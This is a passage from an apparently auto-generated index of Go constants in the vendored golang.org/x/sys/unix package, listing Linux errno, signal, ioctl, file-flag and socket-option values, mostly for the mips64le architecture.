(line 605) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 606) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 607) | ENOPROTOOPT = syscall.Errno(0x63) constant ENOSR (line 608) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 609) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 610) | ENOSYS = syscall.Errno(0x59) constant ENOTCONN (line 611) | ENOTCONN = syscall.Errno(0x86) constant ENOTEMPTY (line 612) | ENOTEMPTY = syscall.Errno(0x5d) constant ENOTNAM (line 613) | ENOTNAM = syscall.Errno(0x89) constant ENOTRECOVERABLE (line 614) | ENOTRECOVERABLE = syscall.Errno(0xa6) constant ENOTSOCK (line 615) | ENOTSOCK = syscall.Errno(0x5f) constant ENOTSUP (line 616) | ENOTSUP = syscall.Errno(0x7a) constant ENOTUNIQ (line 617) | ENOTUNIQ = syscall.Errno(0x50) constant EOPNOTSUPP (line 618) | EOPNOTSUPP = syscall.Errno(0x7a) constant EOVERFLOW (line 619) | EOVERFLOW = syscall.Errno(0x4f) constant EOWNERDEAD (line 620) | EOWNERDEAD = syscall.Errno(0xa5) constant EPFNOSUPPORT (line 621) | EPFNOSUPPORT = syscall.Errno(0x7b) constant EPROTO (line 622) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 623) | EPROTONOSUPPORT = syscall.Errno(0x78) constant EPROTOTYPE (line 624) | EPROTOTYPE = syscall.Errno(0x62) constant EREMCHG (line 625) | EREMCHG = syscall.Errno(0x52) constant EREMDEV (line 626) | EREMDEV = syscall.Errno(0x8e) constant EREMOTE (line 627) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 628) | EREMOTEIO = syscall.Errno(0x8c) constant ERESTART (line 629) | ERESTART = syscall.Errno(0x5b) constant ERFKILL (line 630) | ERFKILL = syscall.Errno(0xa7) constant ESHUTDOWN (line 631) | ESHUTDOWN = syscall.Errno(0x8f) constant ESOCKTNOSUPPORT (line 632) | ESOCKTNOSUPPORT = syscall.Errno(0x79) constant ESRMNT (line 633) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 634) | ESTALE = syscall.Errno(0x97) constant ESTRPIPE (line 635) | ESTRPIPE = syscall.Errno(0x5c) constant ETIME (line 636) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 637) | ETIMEDOUT = syscall.Errno(0x91) constant ETOOMANYREFS (line 638) | ETOOMANYREFS = syscall.Errno(0x90) constant EUCLEAN (line 639) | EUCLEAN = syscall.Errno(0x87) constant EUNATCH (line 640) | EUNATCH = syscall.Errno(0x2a) constant EUSERS (line 641) | EUSERS = syscall.Errno(0x5e) constant EXFULL (line 642) | EXFULL = syscall.Errno(0x34) constant SIGBUS (line 647) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 648) | SIGCHLD = syscall.Signal(0x12) constant SIGCLD (line 649) | SIGCLD = syscall.Signal(0x12) constant SIGCONT (line 650) | SIGCONT = syscall.Signal(0x19) constant SIGEMT (line 651) | SIGEMT = syscall.Signal(0x7) constant SIGIO (line 652) | SIGIO = syscall.Signal(0x16) constant SIGPOLL (line 653) | SIGPOLL = syscall.Signal(0x16) constant SIGPROF (line 654) | SIGPROF = syscall.Signal(0x1d) constant SIGPWR (line 655) | SIGPWR = syscall.Signal(0x13) constant SIGSTOP (line 656) | SIGSTOP = syscall.Signal(0x17) constant SIGSYS (line 657) | SIGSYS = syscall.Signal(0xc) constant SIGTSTP (line 658) | SIGTSTP = syscall.Signal(0x18) constant SIGTTIN (line 659) | SIGTTIN = syscall.Signal(0x1a) constant SIGTTOU (line 660) | SIGTTOU = syscall.Signal(0x1b) constant SIGURG (line 661) | SIGURG = syscall.Signal(0x15) constant SIGUSR1 (line 662) | SIGUSR1 = syscall.Signal(0x10) constant SIGUSR2 (line 663) | SIGUSR2 = syscall.Signal(0x11) constant SIGVTALRM (line 664) | SIGVTALRM = syscall.Signal(0x1c) constant SIGWINCH (line 665) | SIGWINCH = syscall.Signal(0x14) constant SIGXCPU (line 666) | SIGXCPU = syscall.Signal(0x1e) constant SIGXFSZ (line 667) | SIGXFSZ = syscall.Signal(0x1f) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_mips64le.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x2000127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x40081270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x80081271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x20001277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x2000127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x20001261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x20001265 constant BLKFRASET (line 36) | BLKFRASET = 0x20001264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x40081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x20001260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x40081272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x20001278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x20001279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x2000127b constant BLKRAGET (line 43) | BLKRAGET = 0x20001263 constant BLKRASET (line 44) | BLKRASET = 0x20001262 constant BLKROGET (line 45) | BLKROGET = 0x2000125e constant BLKROSET (line 46) | BLKROSET = 0x2000125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x2000127e constant BLKRRPART (line 48) | BLKRRPART = 0x2000125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x2000127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x20001267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x20001266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x20001268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x2000127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x41484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x40104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x80 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x80049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x8020940d constant FLUSHO (line 87) | FLUSHO = 0x2000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x80806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x40086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x4010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x800c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x80106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x80086602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x400c6613 constant F_GETLK (line 95) | F_GETLK = 0xe constant F_GETLK64 (line 96) | F_GETLK64 = 0xe constant F_GETOWN (line 97) | F_GETOWN = 0x17 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0x6 constant F_SETLK64 (line 100) | F_SETLK64 = 0x6 constant F_SETLKW (line 101) | F_SETLKW = 0x7 constant F_SETLKW64 (line 102) | F_SETLKW64 = 0x7 constant F_SETOWN (line 103) | F_SETOWN = 0x18 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x40084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x50044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x40044801 constant HUPCL (line 109) | HUPCL = 0x400 constant ICANON (line 110) | ICANON = 0x2 constant IEXTEN (line 111) | IEXTEN = 0x100 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x80 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x200007b9 constant ISIG (line 115) | ISIG = 0x1 constant IUCLC (line 116) | IUCLC = 0x200 constant IXOFF (line 117) | IXOFF = 0x1000 constant IXON (line 118) | IXON = 0x400 constant MAP_ANON (line 119) | MAP_ANON = 0x800 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x800 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x2000 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x4000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x1000 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x80000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x8000 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x20000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x400 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x10000 constant MAP_RENAME (line 129) | MAP_RENAME = 0x800 constant MAP_STACK (line 130) | MAP_STACK = 0x40000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x4 constant MEMERASE (line 134) | MEMERASE = 0x80084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x80104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x80084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x40204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x40c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x40044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x40084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x80084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x80084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x80084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x20004d13 constant NFDBITS (line 148) | NFDBITS = 0x40 constant NLDLY (line 149) | NLDLY = 0x100 constant NOFLSH (line 150) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 151) | NS_GET_NSTYPE = 0x2000b703 constant NS_GET_OWNER_UID (line 152) | NS_GET_OWNER_UID = 0x2000b704 constant NS_GET_PARENT (line 153) | NS_GET_PARENT = 0x2000b702 constant NS_GET_USERNS (line 154) | NS_GET_USERNS = 0x2000b701 constant OLCUC (line 155) | OLCUC = 0x2 constant ONLCR (line 156) | ONLCR = 0x4 constant OTPERASE (line 157) | OTPERASE = 0x800c4d19 constant OTPGETREGIONCOUNT (line 158) | OTPGETREGIONCOUNT = 0x80044d0e constant OTPGETREGIONINFO (line 159) | OTPGETREGIONINFO = 0x800c4d0f constant OTPLOCK (line 160) | OTPLOCK = 0x400c4d10 constant OTPSELECT (line 161) | OTPSELECT = 0x40044d0d constant O_APPEND (line 162) | O_APPEND = 0x8 constant O_ASYNC (line 163) | O_ASYNC = 0x1000 constant O_CLOEXEC (line 164) | O_CLOEXEC = 0x80000 constant O_CREAT (line 165) | O_CREAT = 0x100 constant O_DIRECT (line 166) | O_DIRECT = 0x8000 constant O_DIRECTORY (line 167) | O_DIRECTORY = 0x10000 constant O_DSYNC (line 168) | O_DSYNC = 0x10 constant O_EXCL (line 169) | O_EXCL = 0x400 constant O_FSYNC (line 170) | O_FSYNC = 0x4010 constant O_LARGEFILE (line 171) | O_LARGEFILE = 0x0 constant O_NDELAY (line 172) | O_NDELAY = 0x80 constant O_NOATIME (line 173) | O_NOATIME = 0x40000 constant O_NOCTTY (line 174) | O_NOCTTY = 0x800 constant O_NOFOLLOW (line 175) | O_NOFOLLOW = 0x20000 constant O_NONBLOCK (line 176) | O_NONBLOCK = 0x80 constant O_PATH (line 177) | O_PATH = 0x200000 constant O_RSYNC (line 178) | O_RSYNC = 0x4010 constant O_SYNC (line 179) | O_SYNC = 0x4010 constant O_TMPFILE (line 180) | O_TMPFILE = 0x410000 constant O_TRUNC (line 181) | O_TRUNC = 0x200 constant PARENB (line 182) | PARENB = 0x100 constant PARODD (line 183) | PARODD = 0x200 constant PENDIN (line 184) | PENDIN = 0x4000 constant PERF_EVENT_IOC_DISABLE (line 185) | PERF_EVENT_IOC_DISABLE = 0x20002401 constant PERF_EVENT_IOC_ENABLE (line 186) | PERF_EVENT_IOC_ENABLE = 0x20002400 constant PERF_EVENT_IOC_ID (line 187) | PERF_EVENT_IOC_ID = 0x40082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 188) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x8008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 189) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x80042409 constant PERF_EVENT_IOC_PERIOD (line 190) | PERF_EVENT_IOC_PERIOD = 0x80082404 constant PERF_EVENT_IOC_QUERY_BPF (line 191) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 192) | PERF_EVENT_IOC_REFRESH = 0x20002402 constant PERF_EVENT_IOC_RESET (line 193) | PERF_EVENT_IOC_RESET = 0x20002403 constant PERF_EVENT_IOC_SET_BPF (line 194) | PERF_EVENT_IOC_SET_BPF = 0x80042408 constant PERF_EVENT_IOC_SET_FILTER (line 195) | PERF_EVENT_IOC_SET_FILTER = 0x80082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 196) | PERF_EVENT_IOC_SET_OUTPUT = 0x20002405 constant PPPIOCATTACH (line 197) | PPPIOCATTACH = 0x8004743d constant PPPIOCATTCHAN (line 198) | PPPIOCATTCHAN = 0x80047438 constant PPPIOCBRIDGECHAN (line 199) | PPPIOCBRIDGECHAN = 0x80047435 constant PPPIOCCONNECT (line 200) | PPPIOCCONNECT = 0x8004743a constant PPPIOCDETACH (line 201) | PPPIOCDETACH = 0x8004743c constant PPPIOCDISCONN (line 202) | PPPIOCDISCONN = 0x20007439 constant PPPIOCGASYNCMAP (line 203) | PPPIOCGASYNCMAP = 0x40047458 constant PPPIOCGCHAN (line 204) | PPPIOCGCHAN = 0x40047437 constant PPPIOCGDEBUG (line 205) | PPPIOCGDEBUG = 0x40047441 constant PPPIOCGFLAGS (line 206) | PPPIOCGFLAGS = 0x4004745a constant PPPIOCGIDLE (line 207) | PPPIOCGIDLE = 0x4010743f constant PPPIOCGIDLE32 (line 208) | PPPIOCGIDLE32 = 0x4008743f constant PPPIOCGIDLE64 (line 209) | PPPIOCGIDLE64 = 0x4010743f constant PPPIOCGL2TPSTATS (line 210) | PPPIOCGL2TPSTATS = 0x40487436 constant PPPIOCGMRU (line 211) | PPPIOCGMRU = 0x40047453 constant PPPIOCGRASYNCMAP (line 212) | PPPIOCGRASYNCMAP = 0x40047455 constant PPPIOCGUNIT (line 213) | PPPIOCGUNIT = 0x40047456 constant PPPIOCGXASYNCMAP (line 214) | PPPIOCGXASYNCMAP = 0x40207450 constant PPPIOCSACTIVE (line 215) | PPPIOCSACTIVE = 0x80107446 constant PPPIOCSASYNCMAP (line 216) | PPPIOCSASYNCMAP = 0x80047457 constant PPPIOCSCOMPRESS (line 217) | PPPIOCSCOMPRESS = 0x8010744d constant PPPIOCSDEBUG (line 218) | PPPIOCSDEBUG = 0x80047440 constant PPPIOCSFLAGS (line 219) | PPPIOCSFLAGS = 0x80047459 constant PPPIOCSMAXCID (line 220) | PPPIOCSMAXCID = 0x80047451 constant PPPIOCSMRRU (line 221) | PPPIOCSMRRU = 0x8004743b constant PPPIOCSMRU (line 222) | PPPIOCSMRU = 0x80047452 constant PPPIOCSNPMODE (line 223) | PPPIOCSNPMODE = 0x8008744b constant PPPIOCSPASS (line 224) | PPPIOCSPASS = 0x80107447 constant PPPIOCSRASYNCMAP (line 225) | PPPIOCSRASYNCMAP = 0x80047454 constant PPPIOCSXASYNCMAP (line 226) | PPPIOCSXASYNCMAP = 0x8020744f constant PPPIOCUNBRIDGECHAN (line 227) | PPPIOCUNBRIDGECHAN = 0x20007434 constant PPPIOCXFERUNIT (line 228) | PPPIOCXFERUNIT = 0x2000744e constant PR_SET_PTRACER_ANY (line 229) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_GETFPREGS (line 230) | PTRACE_GETFPREGS = 0xe constant PTRACE_GET_THREAD_AREA (line 231) | PTRACE_GET_THREAD_AREA = 0x19 constant PTRACE_GET_THREAD_AREA_3264 (line 232) | PTRACE_GET_THREAD_AREA_3264 = 0xc4 constant PTRACE_GET_WATCH_REGS (line 233) | PTRACE_GET_WATCH_REGS = 0xd0 constant PTRACE_OLDSETOPTIONS (line 234) | PTRACE_OLDSETOPTIONS = 0x15 constant PTRACE_PEEKDATA_3264 (line 235) | PTRACE_PEEKDATA_3264 = 0xc1 constant PTRACE_PEEKTEXT_3264 (line 236) | PTRACE_PEEKTEXT_3264 = 0xc0 constant PTRACE_POKEDATA_3264 (line 237) | PTRACE_POKEDATA_3264 = 0xc3 constant PTRACE_POKETEXT_3264 (line 238) | PTRACE_POKETEXT_3264 = 0xc2 constant PTRACE_SETFPREGS (line 239) | PTRACE_SETFPREGS = 0xf constant PTRACE_SET_THREAD_AREA (line 240) | PTRACE_SET_THREAD_AREA = 0x1a constant PTRACE_SET_WATCH_REGS (line 241) | PTRACE_SET_WATCH_REGS = 0xd1 constant RLIMIT_AS (line 242) | RLIMIT_AS = 0x6 constant RLIMIT_MEMLOCK (line 243) | RLIMIT_MEMLOCK = 0x9 constant RLIMIT_NOFILE (line 244) | RLIMIT_NOFILE = 0x5 constant RLIMIT_NPROC (line 245) | RLIMIT_NPROC = 0x8 constant RLIMIT_RSS (line 246) | RLIMIT_RSS = 0x7 constant RNDADDENTROPY (line 247) | RNDADDENTROPY = 0x80085203 constant RNDADDTOENTCNT (line 248) | RNDADDTOENTCNT = 0x80045201 constant RNDCLEARPOOL (line 249) | RNDCLEARPOOL = 0x20005206 constant RNDGETENTCNT (line 250) | RNDGETENTCNT = 0x40045200 constant RNDGETPOOL (line 251) | RNDGETPOOL = 0x40085202 constant RNDRESEEDCRNG (line 252) | RNDRESEEDCRNG = 0x20005207 constant RNDZAPENTCNT (line 253) | RNDZAPENTCNT = 0x20005204 constant RTC_AIE_OFF (line 254) | RTC_AIE_OFF = 0x20007002 constant RTC_AIE_ON (line 255) | RTC_AIE_ON = 0x20007001 constant RTC_ALM_READ (line 256) | RTC_ALM_READ = 0x40247008 constant RTC_ALM_SET (line 257) | RTC_ALM_SET = 0x80247007 constant RTC_EPOCH_READ (line 258) | RTC_EPOCH_READ = 0x4008700d constant RTC_EPOCH_SET (line 259) | RTC_EPOCH_SET = 0x8008700e constant RTC_IRQP_READ (line 260) | RTC_IRQP_READ = 0x4008700b constant RTC_IRQP_SET (line 261) | RTC_IRQP_SET = 0x8008700c constant RTC_PARAM_GET (line 262) | RTC_PARAM_GET = 0x80187013 constant RTC_PARAM_SET (line 263) | RTC_PARAM_SET = 0x80187014 constant RTC_PIE_OFF (line 264) | RTC_PIE_OFF = 0x20007006 constant RTC_PIE_ON (line 265) | RTC_PIE_ON = 0x20007005 constant RTC_PLL_GET (line 266) | RTC_PLL_GET = 0x40207011 constant RTC_PLL_SET (line 267) | RTC_PLL_SET = 0x80207012 constant RTC_RD_TIME (line 268) | RTC_RD_TIME = 0x40247009 constant RTC_SET_TIME (line 269) | RTC_SET_TIME = 0x8024700a constant RTC_UIE_OFF (line 270) | RTC_UIE_OFF = 0x20007004 constant RTC_UIE_ON (line 271) | RTC_UIE_ON = 0x20007003 constant RTC_VL_CLR (line 272) | RTC_VL_CLR = 0x20007014 constant RTC_VL_READ (line 273) | RTC_VL_READ = 0x40047013 constant RTC_WIE_OFF (line 274) | RTC_WIE_OFF = 0x20007010 constant RTC_WIE_ON (line 275) | RTC_WIE_ON = 0x2000700f constant RTC_WKALM_RD (line 276) | RTC_WKALM_RD = 0x40287010 constant RTC_WKALM_SET (line 277) | RTC_WKALM_SET = 0x8028700f constant SCM_TIMESTAMPING (line 278) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 279) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 280) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 281) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 282) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 283) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 284) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x80182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 285) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x80082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 286) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x80082104 constant SFD_CLOEXEC (line 287) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 288) | SFD_NONBLOCK = 0x80 constant SIOCATMARK (line 289) | SIOCATMARK = 0x40047307 constant SIOCGPGRP (line 290) | SIOCGPGRP = 0x40047309 constant SIOCGSTAMPNS_NEW (line 291) | SIOCGSTAMPNS_NEW = 0x40108907 constant SIOCGSTAMP_NEW (line 292) | SIOCGSTAMP_NEW = 0x40108906 constant SIOCINQ (line 293) | SIOCINQ = 0x467f constant SIOCOUTQ (line 294) | SIOCOUTQ = 0x7472 constant SIOCSPGRP (line 295) | SIOCSPGRP = 0x80047308 constant SOCK_CLOEXEC (line 296) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 297) | SOCK_DGRAM = 0x1 constant SOCK_NONBLOCK (line 298) | SOCK_NONBLOCK = 0x80 constant SOCK_STREAM (line 299) | SOCK_STREAM = 0x2 constant SOL_SOCKET (line 300) | SOL_SOCKET = 0xffff constant SO_ACCEPTCONN (line 301) | SO_ACCEPTCONN = 0x1009 constant SO_ATTACH_BPF (line 302) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 303) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 304) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 305) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 306) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 307) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 308) | SO_BROADCAST = 0x20 constant SO_BSDCOMPAT (line 309) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 310) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 311) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 312) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 313) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 314) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 315) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 316) | SO_DOMAIN = 0x1029 constant SO_DONTROUTE (line 317) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 318) | SO_ERROR = 0x1007 constant SO_INCOMING_CPU (line 319) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 320) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 321) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 322) | SO_LINGER = 0x80 constant SO_LOCK_FILTER (line 323) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 324) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 325) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 326) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 327) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 328) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 329) | SO_OOBINLINE = 0x100 constant SO_PASSCRED (line 330) | SO_PASSCRED = 0x11 constant SO_PASSPIDFD (line 331) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 332) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 333) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 334) | SO_PEERCRED = 0x12 constant SO_PEERGROUPS (line 335) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 336) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 337) | SO_PEERSEC = 0x1e constant SO_PREFER_BUSY_POLL (line 338) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 339) | SO_PROTOCOL = 0x1028 constant SO_RCVBUF (line 340) | SO_RCVBUF = 0x1002 constant SO_RCVBUFFORCE (line 341) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 342) | SO_RCVLOWAT = 0x1004 constant SO_RCVMARK (line 343) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 344) | SO_RCVTIMEO = 0x1006 constant SO_RCVTIMEO_NEW (line 345) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 346) | SO_RCVTIMEO_OLD = 0x1006 constant SO_RESERVE_MEM (line 347) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 348) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 349) | SO_REUSEPORT = 0x200 constant SO_RXQ_OVFL (line 350) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 351) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 352) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 353) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 354) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 355) | SO_SNDBUF = 0x1001 constant SO_SNDBUFFORCE (line 356) | SO_SNDBUFFORCE = 0x1f constant SO_SNDLOWAT (line 357) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 358) | SO_SNDTIMEO = 0x1005 constant SO_SNDTIMEO_NEW (line 359) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 360) | SO_SNDTIMEO_OLD = 0x1005 constant SO_STYLE (line 361) | SO_STYLE = 0x1008 constant SO_TIMESTAMPING (line 362) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 363) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 364) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 365) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 366) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 367) | 